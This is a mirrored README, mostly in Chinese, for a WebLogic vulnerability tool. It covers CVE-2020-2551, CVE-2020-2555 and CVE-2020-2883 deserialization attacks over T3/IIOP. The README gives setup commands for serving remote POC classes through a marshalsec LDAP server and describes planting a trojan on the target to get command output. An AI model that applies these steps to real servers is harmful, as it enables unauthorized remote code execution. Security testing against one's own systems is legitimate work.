The weblogic-framework from sv3nbeast

weblogic-framework

weblogic-framework is the best tool for detecting weblogic vulnerabilities.

免责申明

本工具仅适用于安全技术研究，严禁使用本工具发起网络黑客攻击，造成的法律后果，请使用者自负。

使用方式

常用漏洞

由于 Weblogic 的补丁是互斥的，安装最新的补丁时需要进行卸载之前的补丁，所以以下漏洞仅会保持最新、高可用的原则进行使用。

CVE-2020-2551

CVE-2020-2551 检测需要配合 LDAP 进行检测，回显 POC 可使用远程 CDN 的地址也可以自启 HTTP 服务提供。

/**
 * Title: CVE-2020-2551
 * Desc:
 * <p>
 *     攻击者可以通过 T3、IIOP 协议远程访问 Weblogic Server 服务器上的远程接口，传入恶意数据，从而获取服务器 权限并在未授权情况下远程执行任意代码。
 *     漏洞影响版本:
 *     Oracle WebLogic Server 10.3.6.0.0
 *     Oracle WebLogic Server 12.1.3.0.0
 *     Oracle WebLogic Server 12.2.1.3.0
 *     Oracle WebLogic Server 12.2.1.4.0
 *     github: https://github.com/0nise/CVE-2020-2551
 *     paper: https://www.r4v3zn.com/posts/b64d9185/
 * </p>
 * Date:2020/3/23 23:05
 * Email:[email protected]
 * @version 1.1.0
 */

将 POC 目录中文件上传至 HTTP 服务中，或者上传至静态可访问目录，也可以上传至CDN等。

python3 -m http.server 80

远程提供 POC 如下：

URL	LDAP 设置地址	回显类	备注
http://ip:port/PocServerClusterMasterRemote.class	http://ip:port/#PocServerClusterMasterRemote	ClusterMasterRemote	ClusterMasterRemote 回显（默认）
http://ip:port/PocServerRemoteChannelService.class	http://ip:port/#PocServerRemoteChannelService	RemoteChannelService	ClusterMasterRemote 回显
http://ip:port/PocServerRemoteLeasingBasis.class	http://ip:port/#PocServerRemoteLeasingBasis	RemoteLeasingBasis	RemoteLeasingBasis 回显
http://ip:port/PocServerRemoteMigratableServiceCoordinator.class	http://ip:port/#PocServerRemoteMigratableServiceCoordinator	RemoteMigratableServiceCoordinator	RemoteMigratableServiceCoordinator 回显
http://ip:port/PocServerSingletonMonitorRemote.class	http://ip:port/#PocServerSingletonMonitorRemote	SingletonMonitorRemote	SingletonMonitorRemote 回显
http://ip:port/PocServerSubCoordinatorRM.class	http://ip:port/#PocServerSubCoordinatorRM	SubCoordinatorRM	SubCoordinatorRM 回显

启动 LDAP 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#PocServerClusterMasterRemote 1099

配置 LDAP 地址：

CommonsCollections6

/**
 * Title: CommonsCollections6
 * Desc:
 * <p>
 *     攻击者可以通过 T3、IIOP 协议远程访问 Weblogic Server 服务器上的远程接口，传入恶意数据，从而获取服务器 权限并在未授权情况下远程执行任意代码。
 *     漏洞影响版本:
 *     Oracle WebLogic Server 10.3.6.0.0
 *     Oracle WebLogic Server 12.1.3.0.0
 * </p>
 * Date:2020/4/5 3:48
 * @version 1.0.0
 */

CVE-2020-2555

/**
 * Title: CVE-2020-2555
 * Desc:
 * <p>
 *     CVE-2020-2555
 *     Oracle Fusion 中间件 Oracle Coherence 存在缺陷，攻击者可利用该漏洞在未经授权下通过构造 T3、IIOP 协议请求，获取 Weblogic 服务器权限，执行任意命令。
 *     该漏洞主要是因为 com.tangosol.util.filter.LimitFilter#toString 触发。
 *     漏洞影响版本:
 *     Oracle Coherence 3.7.1.17
 *     Oracle Coherence & Weblogic 12.1.3.0.0
 *     Oracle Coherence & Weblogic 12.2.1.3.0
 *     Oracle Coherence & Weblogic 12.2.1.4.0
 *     github: https://github.com/0nise/CVE-2020-2555
 *     paper: https://www.r4v3zn.com/posts/975312a1/
 * </p>
 * Date:2020/3/31 21:31
 * @version 1.0.0
 */

CVE-2020-2883

/**
 * Title: CVE-2020-2883
 * Desc:
 * <p>
 *     CVE-2020-2883
 *     Oracle Fusion 中间件 Oracle Coherence 存在缺陷，攻击者可利用该漏洞在未经授权下通过构造 T3、IIOP 协议请求，获取 Weblogic服务器权限，执行任意命令。
 *     该漏洞主要为 CVE-2020-2555 基于 CommonsCollections2 （ExtractorComparator + PriorityQueue） 的绕过。
 *     漏洞影响版本:
 *     Oracle Coherence 3.7.1.17
 *     Oracle Coherence & Weblogic 12.1.3.0.0
 *     Oracle Coherence & Weblogic 12.2.1.3.0
 *     Oracle Coherence & Weblogic 12.2.1.4.0
 * </p>
 * Date: 2020/4/19 15:28
 *
 * @version 1.0.0
 */

使用

CommonsCollections6 不需要额外配置参数可直接利用，影响版本：Weblogic 10.3.6.0、12.1.3.0 。
CVE-2020-2555、CVE-2020-2883 利用时特殊情况（Weblogic 版本为 12.2.x）下需要配置 javascript.jar 的下载地址，默认程序会自带一个下载地址，如失效可通过将 com.bea.javascript.jar 文件放置在可访问的 HTTP 服务中，影响版本：Weblogic 12.1.3.0.0、12.2.1.3.0、 12.2.1.4.0。

攻击成功时会程序会展示 token 名称，复制 token 名称至命令执行中的 token 输入框中，即可执行命令：

附录

回显方案

Javascript

通过 javascript.jar 进行加载 byte[] 字节码文件进行序列化，写入木马，绑定回显。

FileOutStream

通过 FileOutStream 将字节码文件写入 Weblogic 服务器中
通过 URLClassLoader 进行加载 FileOutStream 写入的文件木马并反射执行木马。
URLClassLoader 暂且不支持 CVE-2020-2551 漏洞。

配置项

目标地址

需要测试目标地址，格式必须为 HTTP 开头

回显方案

见回显方案说明

javascript 地址

当回显方案配置为 Javascript 时需要配置，默认情况会配置一个地址，也可自建一个 HTTP 服务将文件作为下载文件。

LDAP 地址

验证 CVE-2020-2551 时必须要使用的配置项，默认情况下不会进行配置需要自行开启 LDAP 服务，利用的 EXP 默认存储在 poc 目录中（在手册中附带远程的地址，使用时可直接指向远程地址），开启 LDAP 服务可通过 marshalsec 进行启动，以下为详细的启动命令：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#PocServerClusterMasterRemote 1099

漏洞编号

默认情况下为请选择选项，目前已经集成 CVE-2020-2551、CVE-2020-2555、CVE-2020-2883。

协议

测试、利用漏洞时使用的协议，默认情况下使用 IIOP 协议，T3 协议不稳定。

回显类

使用 T3、IIOP 协议进行利用时执行命令回显的类，默认情况下为 ClusterMasterRemote。

编码

执行命令执行回显的编码，默认情况下为自动，可通过配置项设置为 UTF-8、GBK 编码。

版本

Weblogic 版本，在提前得知版本的情况下可通过该方式进行配置。

FQA

Q：为什么加入之前的漏洞？

Weblogic 的安全更新补丁是互斥的，安装是需要卸载之前的补丁，所以只需要保持最近一年的精华利用漏洞即可。

更新日志

2020-06-25

新增 T3、IIOP 协议开放检测
优化 CVE-2020-2551 回显方案

2020-04-04

取消入口为 ip + port 方式修改为 url 方式
修改部分实现

sv3nbeast / weblogic-framework Goto Github PK

weblogic-framework's Introduction

weblogic-framework

免责申明

使用方式

常用漏洞

CVE-2020-2551

CommonsCollections6

CVE-2020-2555

CVE-2020-2883

使用

附录

回显方案

Javascript

FileOutStream

配置项

目标地址

回显方案

javascript 地址

LDAP 地址

漏洞编号

协议

回显类

编码

版本

FQA

更新日志

weblogic-framework's People

Contributors

Stargazers

Watchers

Forkers

Recommend Projects

Recommend Topics

Recommend Org